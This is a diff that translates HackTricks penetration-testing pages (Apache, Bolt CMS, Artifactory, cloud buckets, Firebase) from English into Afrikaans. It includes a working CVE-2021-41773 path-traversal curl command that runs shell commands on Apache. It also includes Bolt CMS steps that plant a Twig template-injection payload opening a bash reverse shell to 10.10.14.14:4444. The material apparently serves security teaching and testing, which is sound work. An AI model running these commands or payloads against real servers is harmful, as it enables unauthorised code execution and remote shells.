+* [Angular Security: The Definitive Guide (Deel 1)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-1)
+* [Angular Security: The Definitive Guide (Deel 2)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-2)
+* [Angular Security: The Definitive Guide (Deel 3)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-3)
 * [Angular Security: Checklist](https://lsgeurope.com/post/angular-security-checklist)
-* [Workspace and project file structure](https://angular.io/guide/file-structure)
-* [Introduction to components and templates](https://angular.io/guide/architecture-components)
-* [Source map configuration](https://angular.io/guide/workspace-config#source-map-configuration)
-* [Binding syntax](https://angular.io/guide/binding-syntax)
-* [Angular Context: Easy Data-Binding for Nested Component Trees and the Router Outlet](https://medium.com/angular-in-depth/angular-context-easy-data-binding-for-nested-component-trees-and-the-router-outlet-a977efacd48)
-* [Sanitization and security contexts](https://angular.io/guide/security#sanitization-and-security-contexts)
+* [Workspace en projeklêerstruktuur](https://angular.io/guide/file-structure)
+* [Inleiding tot komponente en sjablone](https://angular.io/guide/architecture-components)
+* [Bronkaartkonfigurasie](https://angular.io/guide/workspace-config#source-map-configuration)
+* [Binding sintaksis](https://angular.io/guide/binding-syntax)
+* [Angular-konteks: Maklike data-binding vir geneste komponentbome en die Router Outlet](https://medium.com/angular-in-depth/angular-context-easy-data-binding-for-nested-component-trees-and-the-router-outlet-a977efacd48)
+* [Sanitisering en sekuriteitskontekste](https://angular.io/guide/security#sanitization-and-security-contexts)
 * [GitHub - angular/dom\_security\_schema.ts](https://github.com/angular/angular/blob/main/packages/compiler/src/schema/dom\_security\_schema.ts)
-* [XSS in Angular and AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md)
+* [XSS in Angular en AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md)
 * [Angular Universal](https://angular.io/guide/universal)
 * [DOM XSS](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss)
 * [Angular ElementRef](https://angular.io/api/core/ElementRef)
 * [Angular Renderer2](https://angular.io/api/core/Renderer2)
-* [Renderer2 Example: Manipulating DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/)
-* [jQuery API Documentation](http://api.jquery.com/)
-* [How To Use jQuery With Angular (When You Absolutely Have To)](https://blog.bitsrc.io/how-to-use-jquery-with-angular-when-you-absolutely-have-to-42c8b6a37ff9)
+* [Renderer2-voorbeeld: Manipulering van die DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/)
+* [jQuery API-dokumentasie](http://api.jquery.com/)
+* [Hoe om jQuery met Angular te gebruik (Wanneer jy absoluut moet)](https://blog.bitsrc.io/how-to-use-jquery-with-angular-when-you-absolutely-have-to-42c8b6a37ff9)
 * [Angular Document](https://angular.io/api/common/DOCUMENT)
 * [Angular Location](https://angular.io/api/common/Location)
 * [Angular Router](https://angular.io/api/router/Router)
diff --git a/network-services-pentesting/pentesting-web/apache.md b/network-services-pentesting/pentesting-web/apache.md
index eebb504b2..ad31e6f5c 100644
--- a/network-services-pentesting/pentesting-web/apache.md
+++ b/network-services-pentesting/pentesting-web/apache.md
@@ -1,59 +1,79 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

 
 
-# Executable PHP extensions
-
-Check which extensions is executing the Apache server. To search them you can execute:
+# Uitvoerbare PHP-uitbreidings
 
+Kyk watter uitbreidings die Apache-bediener uitvoer. Om dit te soek, kan jy uitvoer:
 ```bash
- grep -R -B1 "httpd-php" /etc/apache2
+grep -R -B1 "httpd-php" /etc/apache2
 ```
-
-Also, some places where you can find this configuration is:
-
+Ook, sommige plekke waar jy hierdie konfigurasie kan vind is:
 ```bash
 /etc/apache2/mods-available/php5.conf
 /etc/apache2/mods-enabled/php5.conf
 /etc/apache2/mods-available/php7.3.conf
 /etc/apache2/mods-enabled/php7.3.conf
 ```
-
 # CVE-2021-41773
 
+## Oorsig
+
+CVE-2021-41773 is 'n kwesbaarheid wat gevind is in Apache HTTP Server. Dit maak dit moontlik vir 'n aanvaller om 'n aanval uit te voer en toegang te verkry tot die inhoud van 'n willekeurige lêer op die bediener.
+
+## Beskrywing
+
+Hierdie kwesbaarheid word veroorsaak deur 'n fout in die manier waarop die Apache HTTP Server omgaan met die verwerking van 'n spesifieke soort versoek. Wanneer 'n aanvaller 'n spesiale HTTP-versoek stuur na 'n Apache-bediening, kan dit lei tot die uitvoering van 'n padtraversering-aanval.
+
+'n Padtraversering-aanval maak dit moontlik vir 'n aanvaller om toegang te verkry tot lêers en mappe wat buite die beoogde roete van die webtoepassing lê. In die geval van CVE-2021-41773 kan 'n aanvaller dus toegang verkry tot enige lêer op die bediener, insluitend gevoelige inligting soos konfigurasie-lêers, databasislêers en ander vertroulike data.
+
+## Impak
+
+As 'n aanvaller suksesvol is in die uitbuiting van hierdie kwesbaarheid, kan dit lei tot ernstige gevolge, insluitend:
+
+- Blootstelling van gevoelige inligting
+- Verlies van vertroulike data
+- Potensiële skending van privaatheid
+- Moontlike aanvalle op ander stelsels wat afhanklik is van die Apache-bediening
+
+## Aanbevelings
+
+Om die risiko van uitbuiting van hierdie kwesbaarheid te verminder, word die volgende aanbevelings gemaak:
+
+- **Opgradering**: Installeer die nuutste weergawe van Apache HTTP Server, waarin hierdie kwesbaarheid reggestel is.
+- **Pakketbestuurder**: As jy Apache HTTP Server gebruik wat deur 'n pakketbestuurder soos apt of yum verskaf word, verseker dat jy die nuutste opdaterings geïnstalleer het.
+- **Toegangsbeheer**: Beperk die toegang tot die Apache-bediening tot vertroude gebruikers en IP-adresse.
+- **Webtoepassing-sekuriteit**: Implementeer veilige programeringspraktyke en toepassingsvlak-sekuriteitsmaatreëls om die risiko van padtraversering-aanvalle te verminder.
+
+## Verwysings
+
+- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-41773)
 ```bash
 curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 Linux
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
index dcfdea2bb..0b68f844f 100644
--- a/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
+++ b/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
@@ -1,33 +1,29 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-**Check this post:** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)
+**Kyk na hierdie pos:** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/bolt-cms.md b/network-services-pentesting/pentesting-web/bolt-cms.md
index 4ee95a295..07932a89f 100644
--- a/network-services-pentesting/pentesting-web/bolt-cms.md
+++ b/network-services-pentesting/pentesting-web/bolt-cms.md
@@ -2,48 +2,48 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 ## RCE
 
-After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:
+Nadat jy as admin ingeteken het (gaan na /bot om toegang tot die aanmeldingsvenster te verkry), kan jy RCE in Bolt CMS kry:
 
-* Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
-  * Check the value of theme
+* Kies `Configuration` -> `View Configuration` -> `Main Configuration` of gaan na die URL-pad `/bolt/file-edit/config?file=/bolt/config.yaml`
+* Kontroleer die waarde van die tema
 
 

 
-* Select `File management` -> `View & edit templates`
-  * Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`
-  * In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
-* Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
-  * And save changes
+* Kies `File management` -> `View & edit templates`
+* Kies die tema basis wat in die vorige stap gevind is (`base-2021` in hierdie geval) en kies `index.twig`
+* In my geval is dit in die URL-pad /bolt/file-edit/themes?file=/base-2021/index.twig
+* Stel jou payload in hierdie lêer via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), soos: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
+* En stoor veranderinge
 
 

 
-* Clear the cache in `Maintenance` -> `Clear the cache`
-* Access again the page as a regular user, and the payload should be executed
+* Maak die cache skoon in `Maintenance` -> `Clear the cache`
+* Kry weer toegang tot die bladsy as 'n gewone gebruiker, en die payload behoort uitgevoer te word
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/buckets/README.md b/network-services-pentesting/pentesting-web/buckets/README.md
index 76f831c13..e646325f4 100644
--- a/network-services-pentesting/pentesting-web/buckets/README.md
+++ b/network-services-pentesting/pentesting-web/buckets/README.md
@@ -1,33 +1,33 @@
-# Buckets
+# Emmers
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-Check this page if you want to learn more about enumerating and abusing Buckets:
+Kyk na hierdie bladsy as jy meer wil leer oor die opspoor en misbruik van Emmers:
 
 {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/network-services-pentesting/pentesting-web/buckets/firebase-database.md
index 231495bd1..10fa57528 100644
--- a/network-services-pentesting/pentesting-web/buckets/firebase-database.md
+++ b/network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -1,33 +1,33 @@
-# Firebase Database
+# Firebase Databasis
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-## What is Firebase
+## Wat is Firebase
 
-Firebase is a Backend-as-a-Services mainly for mobile application. It is focused on removing the charge of programming the back-end providing a nice SDK as well as many other interesting things that facilitates the interaction between the application and the back-end.
+Firebase is 'n Backend-as-a-Service wat hoofsaaklik vir mobiele toepassings gebruik word. Dit fokus daarop om die las van die programmering van die agterkant te verwyder deur 'n mooi SDK sowel as baie ander interessante dinge te bied wat die interaksie tussen die toepassing en die agterkant vergemaklik.
 
-Learn more about Firebase in:
+Leer meer oor Firebase by:
 
 {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-web/cgi.md b/network-services-pentesting/pentesting-web/cgi.md
index 7aaa163a8..18314b6d4 100644
--- a/network-services-pentesting/pentesting-web/cgi.md
+++ b/network-services-pentesting/pentesting-web/cgi.md
@@ -1,45 +1,56 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
